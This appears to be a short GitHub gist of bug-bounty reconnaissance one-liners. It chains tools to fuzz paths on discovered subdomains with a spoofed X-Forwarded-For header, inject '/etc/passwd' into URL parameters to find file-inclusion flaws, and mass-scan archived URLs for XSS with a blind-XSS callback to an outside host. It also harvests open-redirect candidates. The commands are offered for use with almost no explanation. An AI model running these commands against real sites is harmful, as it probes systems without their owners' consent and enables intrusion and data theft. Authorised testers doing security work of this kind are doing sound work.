Skip to content

Instantly share code, notes, and snippets.

@incogbyte

incogbyte/oneliners.md

Last active October 31, 2023 04:03
Show Gist options
  • Save incogbyte/860e24950493fc4edf4b856efcdb0ab5 to your computer and use it in GitHub Desktop.
Save incogbyte/860e24950493fc4edf4b856efcdb0ab5 to your computer and use it in GitHub Desktop.
Download ZIP
One liners recon
Raw
oneliners.md
  • FFUF fuzzing paths + Domains
    • assetfinder http://DOMAIN.COM | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w wordlist_paths -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"'
  • LFI testing
    • gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
  • XSS testing + blinding XSS
    • cat domains | waybackurls| egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | uro | dalfox pipe -b xss_hunter.ht -o xss_results
  • Open Redirect
    • cat domains | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment